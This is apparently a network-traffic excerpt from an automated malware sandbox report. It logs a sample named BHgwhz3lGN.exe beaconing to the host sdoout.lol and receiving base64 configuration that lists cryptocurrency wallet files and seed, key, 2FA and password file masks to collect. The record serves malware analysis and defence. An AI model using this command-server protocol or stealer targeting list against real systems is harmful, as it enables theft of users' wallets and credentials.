                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:49 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          38192.168.2.95394720.189.173.84434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735570541060&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 9874
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0D1D943A7B9D67B72691815F7AEF6664; _EDGE_S=F=1&SID=38B0BBDA67E56A6606D2AEBF66AE6B66; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC9874OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 30 54 31 34 3a 35 35 3a 34 31 2e 30 36 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 63 33 38 35 63 63 37 2d 31 30 34 61 2d 34 36 39 39 2d 62 63 64 39 2d 38 37 34 63 32 63 61 31 38 30 37 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 39 31 33 37 33 31 34 36 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-30T14:55:41.060Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"ac385cc7-104a-4699-bcd9-874c2ca1807c","epoch":"1913731461"},"app":{"loc
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=41c120c6245d487087fd3d4a5dfd04d8&HASH=41c1&LV=202412&V=4&LU=1735570542757; Domain=.microsoft.com; Expires=Tue, 30 Dec 2025 14:55:42 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=b0a7fa8eae8e47319fd73182b64b1e8c; Domain=.microsoft.com; Expires=Mon, 30 Dec 2024 15:25:42 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: 1697
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:42 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          39192.168.2.953950116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:44 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ectjmgl68gln7qimymg4
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:44 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 65 63 74 6a 6d 67 6c 36 38 67 6c 6e 37 71 69 6d 79 6d 67 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 65 63 74 6a 6d 67 6c 36 38 67 6c 6e 37 71 69 6d 79 6d 67 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 65 63 74 6a 6d 67 6c 36 38 67 6c 6e 37 71 69 6d 79 6d 67 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ectjmgl68gln7qimymg4Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------ectjmgl68gln7qimymg4Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------ectjmgl68gln7qimymg4Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:45 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          40192.168.2.953952116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:46 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----2v3w47qq1ny5fus0r1va
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 76 33 77 34 37 71 71 31 6e 79 35 66 75 73 30 72 31 76 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 32 76 33 77 34 37 71 71 31 6e 79 35 66 75 73 30 72 31 76 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 32 76 33 77 34 37 71 71 31 6e 79 35 66 75 73 30 72 31 76 61 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------2v3w47qq1ny5fus0r1vaContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------2v3w47qq1ny5fus0r1vaContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------2v3w47qq1ny5fus0r1vaCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:46 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:46 UTC2364INData Raw: 39 33 30 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                          Data Ascii: 930REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          41192.168.2.953954116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:47 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----b1dbaiwtrqie3e3oh4ec
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:47 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 62 31 64 62 61 69 77 74 72 71 69 65 33 65 33 6f 68 34 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 62 31 64 62 61 69 77 74 72 71 69 65 33 65 33 6f 68 34 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 62 31 64 62 61 69 77 74 72 71 69 65 33 65 33 6f 68 34 65 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------b1dbaiwtrqie3e3oh4ecContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------b1dbaiwtrqie3e3oh4ecContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------b1dbaiwtrqie3e3oh4ecCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:48 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          42192.168.2.953961116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:49 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----hvai5f3ekf37qqqi5xlx
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:49 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 68 76 61 69 35 66 33 65 6b 66 33 37 71 71 71 69 35 78 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 68 76 61 69 35 66 33 65 6b 66 33 37 71 71 71 69 35 78 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 68 76 61 69 35 66 33 65 6b 66 33 37 71 71 71 69 35 78 6c 78 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------hvai5f3ekf37qqqi5xlxContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------hvai5f3ekf37qqqi5xlxContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------hvai5f3ekf37qqqi5xlxCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:50 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          43192.168.2.953965116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:50 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ec2n7q9z58ymyu37gvsr
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:50 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 65 63 32 6e 37 71 39 7a 35 38 79 6d 79 75 33 37 67 76 73 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 65 63 32 6e 37 71 39 7a 35 38 79 6d 79 75 33 37 67 76 73 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 65 63 32 6e 37 71 39 7a 35 38 79 6d 79 75 33 37 67 76 73 72 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ec2n7q9z58ymyu37gvsrContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------ec2n7q9z58ymyu37gvsrContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------ec2n7q9z58ymyu37gvsrCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:51 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
